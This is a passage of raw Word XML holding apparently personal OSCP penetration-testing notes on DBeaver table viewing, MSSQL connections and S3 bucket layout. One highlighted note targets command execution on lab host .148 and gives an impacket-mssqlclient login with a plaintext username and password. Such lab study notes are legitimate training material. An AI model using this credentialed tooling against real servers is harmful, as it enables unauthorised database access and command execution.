            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="187" name="image186.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image186.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54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1B34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "data"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4799784" cy="3992128"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId547"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4799784" cy="3992128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You see all the entries now</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view something</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4438650" cy="3328988"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="446" name="image440.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image440.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId548"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="443865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1B3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Right click on something like "Tables"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then click on "view tables"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just drag and drop into the big area on the right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B42">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fgdjharludt2" w:id="225"/>
      <w:bookmarkEnd w:id="225"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to connect to mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B43">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that I tried getting command execution to work inside of dbeaver for OSCP-B .148 and it didn't work. So for command execution, stick to impacket-mssqlclient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "Database" and then "new database conncetion" on the top</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3759200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="221" name="image219.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image219.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54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1B46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4597285" cy="4862513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="497" name="image493.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image493.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId550"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4597285" cy="4862513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in your host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Authentication, pick NTLM authentication </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is like like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-windows-auth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag when using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> impacket-mssqlclient sql_svc:Dolphin1@10.10.77.148 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the boxes for Settings. The last one is for ignoring SSL stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then click on "Test Connection" on the bottom left and then "Finish"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="220" name="image205.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image205.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55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B4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get console stuff to run commands, right click on the "master" on the left, and then click on "SQL Editor" and then click on either "New SQL script" or "Open SQL console"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B53">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yreijkki7526" w:id="226"/>
      <w:bookmarkEnd w:id="226"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">S3 (Amazon Simple Storage Service)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">my-awesome-bucket/ (This is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bucket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">├── images/  (This a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Folder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── cat.jpg (This is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── dog.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── vacation/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">├── beach.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">└── mountains.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">├── documents/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── resume.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── project/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── report.docx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
